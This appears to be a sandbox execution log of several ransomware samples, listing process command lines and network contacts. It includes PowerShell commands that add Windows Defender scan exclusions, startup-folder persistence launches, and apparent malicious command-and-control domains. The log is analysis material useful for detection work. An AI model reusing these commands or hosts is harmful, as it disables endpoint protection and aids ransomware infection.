C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Windows\system32\Holocryptic\Crossbarre.exe

C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe

C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe

C:\Users\Admin\AppData\Local\Temp\Rar$EX7.src777\COM7.EXE

\\.\C:\Users\Admin\AppData\Local\Temp\Rar$EX7.src777\COM7.EXE

C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe

C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe

C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe

C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe

C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe

C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe

C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe

C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe

C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe

C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe

C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe

C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start` Menu\Programs\Startup\Admin.exe

C:\Windows\system32\choice.exe

choice /C Y /N /D Y /T 3

C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe

C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe

C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe

C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe

C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe

C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe

C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe

C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe

C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe

C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe

C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe

C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe

C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe

C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe

C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe

C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe

C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe

C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe

C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe

C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe

C:\Users\Admin\Desktop\00484\Trojan-Ransom.Win32.Blocker.njwz-5099cc3970683923bf9ae8537dbf41ec6a27426700ec62ba7c81de7068ab35c1.exe

Trojan-Ransom.Win32.Blocker.njwz-5099cc3970683923bf9ae8537dbf41ec6a27426700ec62ba7c81de7068ab35c1.exe

C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe

C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe

C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe

C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe

C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe

C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe

C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe

C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe

C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe

C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe

C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe

C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe

C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe

C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe

C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe

C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe

C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe

C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe

C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe

C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe

C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe

C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe

C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.Stop.gen-c9cf26ceba119e99260cc610f71d5a8a25333442523e85f9cc0ff3ce293e117c.exe

"C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.Stop.gen-c9cf26ceba119e99260cc610f71d5a8a25333442523e85f9cc0ff3ce293e117c.exe" --Admin IsNotAutoStart IsNotTask

C:\Users\Admin\AppData\Local\Temp\Rar$EX7.sr77\ashcv.exe

\\.\C:\Users\Admin\AppData\Local\Temp\Rar$EX7.sr77\ashcv.exe

C:\Windows\system32\vssvc.exe

C:\Windows\system32\vssvc.exe

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c powershell "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start` Menu\Programs\Startup\Admin.exe

C:\Users\Admin\Desktop\00484\Trojan-Ransom.Win32.Blocker.nlua-a799988bfbf38f7c9005399f089195d79b68ea64c6ed17c4552c043ad92bf426.exe

Trojan-Ransom.Win32.Blocker.nlua-a799988bfbf38f7c9005399f089195d79b68ea64c6ed17c4552c043ad92bf426.exe

C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.Stop.gen-c9cf26ceba119e99260cc610f71d5a8a25333442523e85f9cc0ff3ce293e117c.exe

"C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.Stop.gen-c9cf26ceba119e99260cc610f71d5a8a25333442523e85f9cc0ff3ce293e117c.exe" --Admin IsNotAutoStart IsNotTask

C:\Users\Admin\AppData\Local\Temp\Rar$EX7.sr77\COM7.EXE

\\.\C:\Users\Admin\AppData\Local\Temp\Rar$EX7.sr77\COM7.EXE

C:\Users\Admin\Desktop\00484\Trojan-Ransom.Win32.Blocker.nmtj-b6740f24c14c7ade82150dfcbe8ede8975490766ba66b19d1ccaf7e98453519f.exe

Trojan-Ransom.Win32.Blocker.nmtj-b6740f24c14c7ade82150dfcbe8ede8975490766ba66b19d1ccaf7e98453519f.exe

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start` Menu\Programs\Startup\Admin.exe

C:\Users\Admin\Desktop\00484\Trojan-Ransom.Win32.Crusis.buz-e9e817ad892c6295459c2573c538925bcda3cc36adba56dcf33c8d5217bf0368.exe

Trojan-Ransom.Win32.Crusis.buz-e9e817ad892c6295459c2573c538925bcda3cc36adba56dcf33c8d5217bf0368.exe

C:\Users\Admin\Desktop\00484\Trojan-Ransom.Win32.Cryptodef.aoo-995063825d8bb75cfb1bf983b0685f6633a27584b1fb88a68a0cb3eba6fc0237.exe

Trojan-Ransom.Win32.Cryptodef.aoo-995063825d8bb75cfb1bf983b0685f6633a27584b1fb88a68a0cb3eba6fc0237.exe

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c powershell "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start` Menu\Programs\Startup\Admin.exe

C:\Users\Admin\Desktop\00484\Trojan-Ransom.Win32.Encoder.qdm-e97be292771a327420e20b36dfd845606fb2f605a4291c10b3300365627f0814.exe

Trojan-Ransom.Win32.Encoder.qdm-e97be292771a327420e20b36dfd845606fb2f605a4291c10b3300365627f0814.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe

/Processid:{0a52d887-c53b-4a50-a125-d38c5aaa675f}

C:\Users\Admin\Desktop\00484\Trojan-Ransom.Win32.Foreign.moyy-9aec597ea4451da1ad62c84772d90ab2afedaf10732aa0bdd6178d245585dcd4.exe

Trojan-Ransom.Win32.Foreign.moyy-9aec597ea4451da1ad62c84772d90ab2afedaf10732aa0bdd6178d245585dcd4.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming'

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start` Menu\Programs\Startup\Admin.exe

C:\Users\Admin\AppData\Local\Temp\Rar$EX7.src777\achsv.exe

\\.\C:\Users\Admin\AppData\Local\Temp\Rar$EX7.src777\achsv.exe

C:\Users\Admin\Desktop\00484\Trojan-Ransom.Win32.GandCrypt.fbd-043a50ede74186c54cf4f9ff6e878de32a92bcfecffe247d89011c5521da65db.exe

Trojan-Ransom.Win32.GandCrypt.fbd-043a50ede74186c54cf4f9ff6e878de32a92bcfecffe247d89011c5521da65db.exe

C:\Users\Admin\AppData\Local\Temp\Rar$EX7.src777\COM7.EXE

\\.\C:\Users\Admin\AppData\Local\Temp\Rar$EX7.src777\COM7.EXE

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c powershell "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start` Menu\Programs\Startup\Admin.exe

C:\Users\Admin\Desktop\00484\Trojan-Ransom.Win32.Foreign.moyy-9aec597ea4451da1ad62c84772d90ab2afedaf10732aa0bdd6178d245585dcd4.exe

Trojan-Ransom.Win32.Foreign.moyy-9aec597ea4451da1ad62c84772d90ab2afedaf10732aa0bdd6178d245585dcd4.exe

C:\Users\Admin\Desktop\00484\Trojan-Ransom.Win32.GandCrypt.jgt-be84fd2db01517037caa965618e57173f8e5560c3a83843df27e5bc7d667e689.exe

Trojan-Ransom.Win32.GandCrypt.jgt-be84fd2db01517037caa965618e57173f8e5560c3a83843df27e5bc7d667e689.exe

C:\Users\Admin\AppData\Local\Temp\Rar$EX7.sr77\ashcv.exe

\\.\C:\Users\Admin\AppData\Local\Temp\Rar$EX7.sr77\ashcv.exe

C:\Users\Admin\AppData\Local\Temp\Rar$EX7.sr77\COM7.EXE

\\.\C:\Users\Admin\AppData\Local\Temp\Rar$EX7.sr77\COM7.EXE

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start` Menu\Programs\Startup\Admin.exe

C:\Users\Admin\Desktop\00484\Trojan-Ransom.Win32.GenericCryptor.cys-f82f9d2ba863ed8c4db2d4442678c7355a015150c3bc333fde6652b1c3c930b3.exe

Trojan-Ransom.Win32.GenericCryptor.cys-f82f9d2ba863ed8c4db2d4442678c7355a015150c3bc333fde6652b1c3c930b3.exe

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c powershell "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start` Menu\Programs\Startup\Admin.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 560 -p 5772 -ip 5772

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 5772 -s 480

C:\Users\Admin\Desktop\00484\Trojan-Ransom.Win32.GenericCryptor.czx-87784079f06ec8df763f97a83cc42b434899a7c4336104b59f88e87fc97b03d6.exe

Trojan-Ransom.Win32.GenericCryptor.czx-87784079f06ec8df763f97a83cc42b434899a7c4336104b59f88e87fc97b03d6.exe

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start` Menu\Programs\Startup\Admin.exe

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c powershell "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start` Menu\Programs\Startup\Admin.exe

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start` Menu\Programs\Startup\Admin.exe

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c powershell "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start` Menu\Programs\Startup\Admin.exe

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start` Menu\Programs\Startup\Admin.exe

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c powershell "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start` Menu\Programs\Startup\Admin.exe

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start` Menu\Programs\Startup\Admin.exe

C:\Windows\SysWOW64\shell.exe

"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Admin.exe"

C:\Windows\system32\wbem\WmiApSrv.exe

C:\Windows\system32\wbem\WmiApSrv.exe

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c powershell "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start` Menu\Programs\Startup\Admin.exe

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start` Menu\Programs\Startup\Admin.exe

C:\Windows\SysWOW64\shell.exe

"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Admin.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp'

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c powershell "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start` Menu\Programs\Startup\Admin.exe

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start` Menu\Programs\Startup\Admin.exe

C:\Windows\SysWOW64\shell.exe

"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Admin.exe"

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c powershell "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start` Menu\Programs\Startup\Admin.exe

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start` Menu\Programs\Startup\Admin.exe

C:\Windows\SysWOW64\shell.exe

"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Admin.exe"

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c powershell "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start` Menu\Programs\Startup\Admin.exe

C:\Windows\SysWOW64\shell.exe

"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Admin.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start` Menu\Programs\Startup\Admin.exe

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c powershell "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start` Menu\Programs\Startup\Admin.exe

C:\Windows\SysWOW64\shell.exe

"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Admin.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start` Menu\Programs\Startup\Admin.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command Add-MpPreference -ExclusionPath 'C:\Windows'

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c powershell "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start` Menu\Programs\Startup\Admin.exe

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start` Menu\Programs\Startup\Admin.exe

C:\Windows\SysWOW64\shell.exe

"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Admin.exe"

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c powershell "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start` Menu\Programs\Startup\Admin.exe

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start` Menu\Programs\Startup\Admin.exe

C:\Windows\SysWOW64\shell.exe

"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Admin.exe"

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c powershell "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start` Menu\Programs\Startup\Admin.exe

C:\Windows\SysWOW64\shell.exe

"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Admin.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start` Menu\Programs\Startup\Admin.exe

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c powershell "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start` Menu\Programs\Startup\Admin.exe

C:\Windows\SysWOW64\shell.exe

"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Admin.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start` Menu\Programs\Startup\Admin.exe

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c powershell "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start` Menu\Programs\Startup\Admin.exe

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start` Menu\Programs\Startup\Admin.exe

C:\Windows\SysWOW64\shell.exe

"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Admin.exe"

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c powershell "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start` Menu\Programs\Startup\Admin.exe

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 217.106.137.52.in-addr.arpa udp
US 8.8.8.8:53 240.221.184.93.in-addr.arpa udp
US 8.8.8.8:53 76.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 133.211.185.52.in-addr.arpa udp
US 8.8.8.8:53 50.23.12.20.in-addr.arpa udp
US 8.8.8.8:53 18.31.95.13.in-addr.arpa udp
US 8.8.8.8:53 217.135.221.88.in-addr.arpa udp
US 8.8.8.8:53 37.56.20.217.in-addr.arpa udp
US 128.31.0.39:9131 128.31.0.39 tcp
US 8.8.8.8:53 39.0.31.128.in-addr.arpa udp
DE 46.229.8.87:9001 tcp
US 216.218.219.41:80 216.218.219.41 tcp
US 8.8.8.8:53 48.229.111.52.in-addr.arpa udp
US 8.8.8.8:53 87.8.229.46.in-addr.arpa udp
US 8.8.8.8:53 41.219.218.216.in-addr.arpa udp
US 8.8.8.8:53 suporte01928492.redirectme.net udp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
DE 193.23.244.244:80 193.23.244.244 tcp
US 8.8.8.8:53 1.112.95.208.in-addr.arpa udp
DE 193.23.244.244:80 193.23.244.244 tcp
US 8.8.8.8:53 244.244.23.193.in-addr.arpa udp
NL 45.66.35.11:80 45.66.35.11 tcp
US 216.218.219.41:80 216.218.219.41 tcp
US 8.8.8.8:53 11.35.66.45.in-addr.arpa udp
US 216.218.219.41:80 216.218.219.41 tcp
DE 193.23.244.244:80 193.23.244.244 tcp
NL 45.66.35.11:80 45.66.35.11 tcp
US 8.8.8.8:53 api.2ip.ua udp
US 172.67.139.220:443 api.2ip.ua tcp
US 8.8.8.8:53 220.139.67.172.in-addr.arpa udp
US 8.8.8.8:53 c.pki.goog udp
GB 142.250.179.227:80 c.pki.goog tcp
US 8.8.8.8:53 topniemannpickshop.cc udp
US 8.8.8.8:53 niemannbest.me udp
US 8.8.8.8:53 all-mobile-pa1ments.com.mx udp
US 8.8.8.8:53 buy-fantasy-football.com.sg udp
US 8.8.8.8:53 iplogger.org udp
US 8.8.8.8:53 227.179.250.142.in-addr.arpa udp
US 104.26.3.46:443 iplogger.org tcp
US 104.26.3.46:443 iplogger.org tcp
US 8.8.8.8:53 46.3.26.104.in-addr.arpa udp
US 8.8.8.8:53 speeddatingstudio.com udp
PL 45.141.215.6:110 tcp
NL 45.66.35.11:80 45.66.35.11 tcp
DE 193.23.244.244:80 193.23.244.244 tcp
US 8.8.8.8:53 6.215.141.45.in-addr.arpa udp
US 8.8.8.8:53 api.2ip.ua udp
US 104.21.65.24:443 api.2ip.ua tcp
US 8.8.8.8:53 znpst.top udp
US 8.8.8.8:53 securebiz.org udp
DE 92.246.89.93:80 znpst.top tcp
US 8.8.8.8:53 24.65.21.104.in-addr.arpa udp
US 8.8.8.8:53 15.173.189.20.in-addr.arpa udp
US 8.8.8.8:53 discord.com udp
US 162.159.138.232:443 discord.com tcp
US 8.8.8.8:53 232.138.159.162.in-addr.arpa udp
US 8.8.8.8:53 afmrx.ddns.net udp
US 8.8.8.8:53 securebiz.org udp
US 8.8.8.8:53 sanctam.net udp
US 8.8.8.8:53 www.ibayme.eb2a.com udp
US 199.59.243.226:80 www.ibayme.eb2a.com tcp
US 199.59.243.226:80 www.ibayme.eb2a.com tcp
US 8.8.8.8:53 226.243.59.199.in-addr.arpa udp
US 8.8.8.8:53 afmrx.ddns.net udp
US 8.8.8.8:53 securebiz.org udp
US 8.8.8.8:53 securebiz.org udp
US 8.8.8.8:53 afmrx.ddns.net udp
US 199.59.243.226:80 www.ibayme.eb2a.com tcp
US 8.8.8.8:53 afmrx.ddns.net udp
US 8.8.8.8:53 securebiz.org udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 afmrx.ddns.net udp
GB 213.255.226.248:28012 tcp
US 8.8.8.8:53 248.226.255.213.in-addr.arpa udp
US 162.159.138.232:443 discord.com tcp
US 8.8.8.8:53 afmrx.ddns.net udp
US 8.8.8.8:53 www.2mmotorsport.biz udp
DE 77.75.249.22:80 www.2mmotorsport.biz tcp
